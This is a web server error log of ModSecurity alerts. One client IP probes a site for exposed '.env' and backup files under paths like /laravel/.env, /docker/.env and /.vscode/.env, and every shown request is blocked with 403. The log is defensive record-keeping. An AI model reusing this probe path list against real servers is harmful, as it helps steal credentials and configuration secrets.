[Fri Dec 05 23:01:09.633294 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aTNWJS5p8hwAo-ApwKs-PAAAAAE"]
[Fri Dec 05 23:01:09.633525 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aTNWJS5p8hwAo-ApwKs-PAAAAAE"]
[Fri Dec 05 23:01:09.633723 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/cron/.env"] [unique_id "aTNWJS5p8hwAo-ApwKs-PAAAAAE"]
[Fri Dec 05 23:01:09.948859 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aTNWJS5p8hwAo-ApwKs-PQAAAAE"]
[Fri Dec 05 23:01:09.949188 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aTNWJS5p8hwAo-ApwKs-PQAAAAE"]
[Fri Dec 05 23:01:09.949467 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/www/.env"] [unique_id "aTNWJS5p8hwAo-ApwKs-PQAAAAE"]
[Fri Dec 05 23:01:10.275298 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aTNWJi5p8hwAo-ApwKs-PgAAAAE"]
[Fri Dec 05 23:01:10.275557 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aTNWJi5p8hwAo-ApwKs-PgAAAAE"]
[Fri Dec 05 23:01:10.275752 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/.env"] [unique_id "aTNWJi5p8hwAo-ApwKs-PgAAAAE"]
[Fri Dec 05 23:01:10.609209 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aTNWJi5p8hwAo-ApwKs-PwAAAAE"]
[Fri Dec 05 23:01:10.609443 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aTNWJi5p8hwAo-ApwKs-PwAAAAE"]
[Fri Dec 05 23:01:10.609649 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/docker/app/.env"] [unique_id "aTNWJi5p8hwAo-ApwKs-PwAAAAE"]
[Fri Dec 05 23:01:10.760091 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aTNWJi5p8hwAo-ApwKs-QAAAAAE"]
[Fri Dec 05 23:01:10.760431 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aTNWJi5p8hwAo-ApwKs-QAAAAAE"]
[Fri Dec 05 23:01:10.760635 2025] [:error] [pid 547542] [client 45.148.10.244:60736] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/env.backup"] [unique_id "aTNWJi5p8hwAo-ApwKs-QAAAAAE"]
[Fri Dec 05 23:01:30.001765 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aTNWOg-QLHaKzoOBZr3NZAAAAAc"]
[Fri Dec 05 23:01:30.002056 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aTNWOg-QLHaKzoOBZr3NZAAAAAc"]
[Fri Dec 05 23:01:30.002276 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.vscode/.env"] [unique_id "aTNWOg-QLHaKzoOBZr3NZAAAAAc"]
[Fri Dec 05 23:01:30.426649 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTNWOg-QLHaKzoOBZr3NZQAAAAc"]
[Fri Dec 05 23:01:30.426880 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTNWOg-QLHaKzoOBZr3NZQAAAAc"]
[Fri Dec 05 23:01:30.427098 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/js/.env"] [unique_id "aTNWOg-QLHaKzoOBZr3NZQAAAAc"]
[Fri Dec 05 23:01:31.201142 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTNWOw-QLHaKzoOBZr3NZgAAAAc"]
[Fri Dec 05 23:01:31.201373 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTNWOw-QLHaKzoOBZr3NZgAAAAc"]
[Fri Dec 05 23:01:31.201568 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/.env"] [unique_id "aTNWOw-QLHaKzoOBZr3NZgAAAAc"]
[Fri Dec 05 23:01:31.719629 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTNWOw-QLHaKzoOBZr3NZwAAAAc"]
[Fri Dec 05 23:01:31.719858 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTNWOw-QLHaKzoOBZr3NZwAAAAc"]
[Fri Dec 05 23:01:31.720075 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/laravel/core/.env"] [unique_id "aTNWOw-QLHaKzoOBZr3NZwAAAAc"]
[Fri Dec 05 23:01:32.089316 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mail/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aTNWPA-QLHaKzoOBZr3NaAAAAAc"]
[Fri Dec 05 23:01:32.089606 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aTNWPA-QLHaKzoOBZr3NaAAAAAc"]
[Fri Dec 05 23:01:32.089828 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/mail/.env"] [unique_id "aTNWPA-QLHaKzoOBZr3NaAAAAAc"]
[Fri Dec 05 23:01:32.853132 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /mailer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aTNWPA-QLHaKzoOBZr3NaQAAAAc"]
[Fri Dec 05 23:01:32.853361 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aTNWPA-QLHaKzoOBZr3NaQAAAAc"]
[Fri Dec 05 23:01:32.853556 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/mailer/.env"] [unique_id "aTNWPA-QLHaKzoOBZr3NaQAAAAc"]
[Fri Dec 05 23:01:33.173198 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /nginx/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NagAAAAc"]
[Fri Dec 05 23:01:33.173432 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NagAAAAc"]
[Fri Dec 05 23:01:33.173621 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/nginx/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NagAAAAc"]
[Fri Dec 05 23:01:33.216320 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NawAAAAc"]
[Fri Dec 05 23:01:33.216576 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NawAAAAc"]
[Fri Dec 05 23:01:33.216775 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/public/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NawAAAAc"]
[Fri Dec 05 23:01:33.269674 2025] [:error] [pid 542657] [client 45.148.10.244:57330] [client 45.148.10.244] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /site/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/site/.env"] [unique_id "aTNWPQ-QLHaKzoOBZr3NbAAAAAc"]
